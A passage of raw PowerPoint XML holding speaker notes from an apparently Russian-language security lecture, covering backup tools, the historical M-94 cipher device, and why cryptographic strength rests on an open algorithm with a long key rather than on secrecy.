            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Вся ОС: виртуальные машины, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>LVM2-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>разделы, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>RAID-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>массивы</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Часть файловой системы: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Allway Sync</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Unison</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide4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5" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>На рисунке </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>M-94 Encryption Disks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The M-94 was a piece of cryptographic equipment used by the United States army, consisting of several lettered discs arranged as a cylinder. The idea for the device was conceived by Colonel Parker Hitt and then developed by Major Joseph Mauborgne in 1917. Officially adopted in 1922, it remained in use until 1945, replaced by more complex and secure electromechanical rotor machines, particularly the M-209. The M-94 was also employed by the US Navy under the name CSP 488.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide4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7" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Секретности алгоритма не стоит придавать большого значения. Попытка со-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>хранить алгоритм в тайне, называемая в торговле безопасностью за счет неяс-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ности (security by obscurity), обречена на провал. К тому же, опубликовав свой</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>алгоритм, разработчик получает бесплатную консультацию от большого количе-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ства ученых-криптоаналитиков, горящих желанием взломать новую систему и</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>тем самым продемонстрировать свои ум и ученость. Если никто не смог взло-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>мать алгоритм за пять лет с момента его опубликования, то, по-видимому, этот</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>алгоритм достаточно прочен.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Поскольку реально в тайне хранится только ключ, основной вопрос заключа-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ется в его длине. Рассмотрим простой кодовый замок. Его основной принцип со-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>стоит в том, что вы последовательно вводите десятичные цифры. Все это знают,</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>но ключ хранится в секрете. Ключ длиной в две цифры образует 100 вариантов.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ключ длиной в три цифры означает 1000 вариантов, а при длине ключа в шесть</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>цифр число комбинаций достигает миллиона. Чем длиннее ключ, тем выше по-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>казатель трудозатрат взломщика кода. При увеличении длины ключа показа-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>тель трудозатрат для взлома системы путем простого перебора значений ключа</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>растет экспоненциально. Секретность передаваемого сообщения обеспечивается</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>мощным (но все же открытым) алгоритмом и длинным ключом. Чтобы не дать</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>прочитать свою электронную почту младшему брату, достаточно 64-разрядного</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ключа. В коммерческих системах имеет смысл использовать 128-битный код.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Чтобы защитить ваши тексты от правительств развитых государств, потребуют-</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ся ключи длиной по меньшей мере в 256 бит.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide5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9" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
